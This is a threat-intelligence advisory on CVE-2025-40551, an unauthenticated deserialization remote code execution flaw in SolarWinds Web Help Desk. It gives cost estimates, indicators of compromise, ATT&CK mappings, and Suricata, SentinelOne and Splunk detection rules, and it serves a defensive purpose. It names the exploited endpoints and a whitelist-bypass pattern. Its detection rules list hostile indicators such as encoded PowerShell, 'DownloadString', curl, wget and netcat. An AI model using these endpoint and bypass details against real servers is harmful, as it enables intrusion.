BLUF

 Unauthenticated remote code execution via deserialization of untrusted data in SolarWinds Web Help Desk, allowing attackers to run commands on the host machine.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

For organizations affected by active exploitation of CVE-2025-40551 in SolarWinds Web Help Desk:

·       Low-end total cost: $700,000 – $1.2M

o   (rapid isolation, no lateral movement, limited operational disruption)

·       Typical expected range: $1.2M – $2.4M

o   (confirmed RCE, full rebuild, moderate investigation and downtime)

·       Upper-bound realistic scenarios: $2.4M – $4.0M

o   (delayed detection, lateral access, regulatory and customer impact)

Key Cost Drivers

·       Time to detection after initial exploitation

·       Degree of service account privilege and credential reuse

·       Scope of lateral movement from the WHD host

·       Regulatory or contractual notification thresholds

·       Cyber insurance exclusions tied to patch timeliness

Potential Affected Sectors

·       Information Technology

·       Enterprise Infrastructure

Potential Affected Countries

·       Global

Date of First Reported Activity

·       Feb 3, 2026

Date of Last Reported Activity Update

·       Feb 3, 2026

CVE-2025-40551

CVSS:3.1

(9.8) AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nessus ID

·       297225

Is CVE-2025-40551 on the KEV list?

·       Yes

What is the CISA patch by date?

·       February 6, 2026

URL to patch information

·       hxxps://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm

Mitigation Steps

·       Isolate affected instances from the public internet.

·       Restrict network access to trusted IP addresses only.

Malware names

CVE-2025-40551 does not have malware associated with it at this time.

Malware Family

·       No specific named malware family has been publicly attributed yet; primarily results in web shell or remote shell access.

Verdict

·       Critical/Malicious exploitation observed in the wild.

Primary Objectives

·       Initial access

·       Remote code execution (RCE)

·       Potentially lateral movement within enterprise networks.

APT Names

·       There has not been an APT group associated with CVE-2025-40551 at this time.

Associated Criminal Orgs

·       There have not been any criminal organizations associated with CVE-2025-40551 at this time.

IOCs

Network-Based Indicators

·       Serialized Java Signatures

o   Detect network traffic to the Web Help Desk service containing the Java "magic bytes" aced0005.

·       Exploit Endpoint Targeting

o   Monitor for suspicious requests directed at /helpdesk/WebObjects/Helpdesk.woa/wo/ or the JSONRPC endpoint.

·       Whitelist Bypass Attempts

o   Look for request parameters containing the string /ajax/, which may indicate attempts to bypass security sanitization.

·       Anomalous Ips

o   High-frequency requests from unknown or unexpected IP addresses targeting these specific application paths.

Host-Based Indicators

·       Suspicious Child Processes

o   Monitor for unexpected child processes spawned by the Web Help Desk Java process (e.g., cmd.exe, powershell.exe, bash, sh).

·       Service Account Activity

o   Audit any system-level commands or shell executions originating directly from the Web Help Desk service account.

·       Anomalous File Modifications

o   Unexpected file creation or changes within Web Help Desk installation directories, specifically the /log/ or /logs/ folders.

·       Log Entries

o   Check whd logs for frequent JSONRPC errors or payloads that fail the application's internal whitelist.

Tools used

·       Opportunistic automated scanners

·       Custom deserialization payload generators

TTPs

·       T1190 Exploit Public-Facing Application

o   This is the primary Initial Access technique. Attackers target the AjaxProxy functionality in internet-exposed WHD instances.

·       T1203 Exploitation for Client Execution

o   Insecure Java deserialization occurs when the application processes a malicious serialized object, often delivered via crafted JSON-RPC requests.

·       T1059 Command and Scripting Interpreter

o   Following successful deserialization, the attacker executes arbitrary commands (e.g., via PowerShell or bash) to gain full control of the host machine.

·       T1548.002 Abuse Elevation Control Mechanism (Bypass User Account Control)

o   Successful exploitation typically grants the attacker the privileges of the WHD service account, which often runs as SYSTEM or a high-privilege administrative user.

·       T1136 Create Account

o   Post-exploitation activity frequently includes creating new administrative accounts to maintain persistent access.

Suggested rules / potential hunts

Suricata

·       WHD whitelist bypass probing (/ajax/ in query)

o   Horizon3 explicitly identifies /Helpdesk.woa/wo/* with "/ajax/" in query parameters as a whitelist bypass indicator.

alert http $EXTERNAL_NET any -> $HOME_NET any (

  msg:"CVE-2025-40551 SolarWinds WHD probe - Helpdesk.woa with ajax in query";

  flow:established,to_server;

  http.uri; content:"/Helpdesk.woa/wo/"; nocase;

  http.uri; content:"/ajax/"; nocase;

  classtype:web-application-attack;

  reference:cve,2025-40551;

  sid:4055101;

  rev:1;

)

·       AjaxProxy / JSON-RPC targeting

alert http $EXTERNAL_NET any -> $HOME_NET any (

  msg:"CVE-2025-40551 SolarWinds WHD AjaxProxy or JSON-RPC access";

  flow:established,to_server;

  http.uri; pcre:"/(ajaxproxy|jsonrpc|jabsorb)/i";

  classtype:web-application-attack;

  reference:cve,2025-40551;

  sid:4055102;

  rev:1;

)

·       JSONRPCBridge exception leakage (post-attempt)

alert http $HOME_NET any -> $EXTERNAL_NET any (

  msg:"CVE-2025-40551 SolarWinds WHD JSONRPCBridge error response";

  flow:established,to_client;

  http.response_body; content:"org.jabsorb.JSONRPCBridge"; nocase;

  classtype:web-application-attack;

  reference:cve,2025-40551;

  sid:4055103;

  rev:1;

)

High-Confidence Suricata Correlation

Alert if:

Rule 4055101 OR 4055102

followed within 5 minutes by 4055103

Same src_ip → same dest_ip

SentinelOne

·       Java (WHD) spawning a shell (Windows)

EventType = "Process Creation"

AND ParentProcessName CONTAINS "java"

AND (

     ProcessName = "cmd.exe"

  OR ProcessName = "powershell.exe"

  OR ProcessName = "pwsh.exe"

  OR ProcessName = "mshta.exe"

  OR ProcessName = "rundll32.exe"

)

Escalate if command line contains:

ProcessCommandLine CONTAINS "-enc"

OR ProcessCommandLine CONTAINS "IEX"

OR ProcessCommandLine CONTAINS "DownloadString"

Java spawning shell (Linux)

EventType = "Process Creation"

AND ParentProcessName = "java"

AND (

     ProcessName = "sh"

  OR ProcessName = "bash"

  OR ProcessName = "dash"

)

Add payload activity:

ProcessCommandLine CONTAINS "curl"

OR ProcessCommandLine CONTAINS "wget"

OR ProcessCommandLine CONTAINS "nc "

·       WebHelpDesk Java writing executable files

EventType = "File Creation"

AND InitiatingProcessName = "java"

AND (

     FilePath CONTAINS "/webhelpdesk"

  OR FilePath CONTAINS "/tomcat"

  OR FilePath CONTAINS "/tmp"

)

AND (

     FileExtension = "jsp"

  OR FileExtension = "jar"

  OR FileExtension = "war"

  OR FileExtension = "sh"

  OR FileExtension = "ps1"

)

·       Network egress from WHD server

EventType = "Network Connection"

AND InitiatingProcessName = "java"

AND Direction = "Outbound"

AND NOT DestinationIP IN (Known_Internal_Ranges)

Splunk

·       /Helpdesk.woa/wo/ + /ajax/ in query

index=web OR index=proxy

(uri="/Helpdesk.woa/wo/*" OR uri_path="/Helpdesk.woa/wo/")

AND (like(uri, "%/ajax/%") OR like(query_string, "%/ajax/%"))

| stats count min(_time) as firstSeen max(_time) as lastSeen

        values(user_agent) as userAgents

        values(status) as statusCodes

        by src_ip dest_ip http_host uri

| sort - count

·       JSONRPCBridge errors (strong exploit signal)

index=app OR index=solarwinds

("org.jabsorb.JSONRPCBridge" OR "AjaxProxy" OR "JSONRPC")

| stats count min(_time) as firstSeen max(_time) as lastSeen

        values(source) as sources

        by host

| sort – count

·       Default client account usage

index=app OR index=solarwinds

(eventType="login" OR message="*login*")

username="client"

| stats count min(_time) as firstSeen max(_time) as lastSeen

        values(src_ip) as srcIPs

        by host

Java spawning shells (EDR ingested logs)

index=edr OR index=oswin OR index=osnix

(parent_process_name="java*" OR parent_command_line="*WebHelpDesk*")

(process_name IN ("cmd.exe","powershell.exe","sh","bash","curl","wget"))

| stats count min(_time) as firstSeen max(_time) as lastSeen

        values(process_command_line) as cmdlines

        by host user parent_process_name process_name

| sort - count

·       Correlated Splunk Detection (Recommended)

(

  search index=web uri="/Helpdesk.woa/wo/*" "/ajax/"

)

OR

(

  search index=app "org.jabsorb.JSONRPCBridge"

)

OR

(

  search index=edr parent_process_name="java*" process_name IN ("cmd.exe","powershell.exe","sh","bash")

)

| transaction host maxspan=10m

| where eventcount >= 2

SOC Triage Guidance (Important)

Treat as FULL COMPROMISE if you see:

·       /Helpdesk.woa/wo/* + /ajax/

·       JSONRPCBridge errors

·       Java spawning shell

·       Outbound beaconing

Immediate actions

Isolate WHD host

Credential reset (WHD + OS)

Search for JSP/webshells

Review scheduled tasks / cron

References

Documentation Solarwinds

·       hxxps://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm

CISA KEV Catalog

·       hxxps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-40551

NVD

·       hxxps://nvd.nist.gov/vuln/detail/CVE-2025-40551

Tenable

·       hxxps://www.tenable.com/cve/CVE-2025-40551/plugins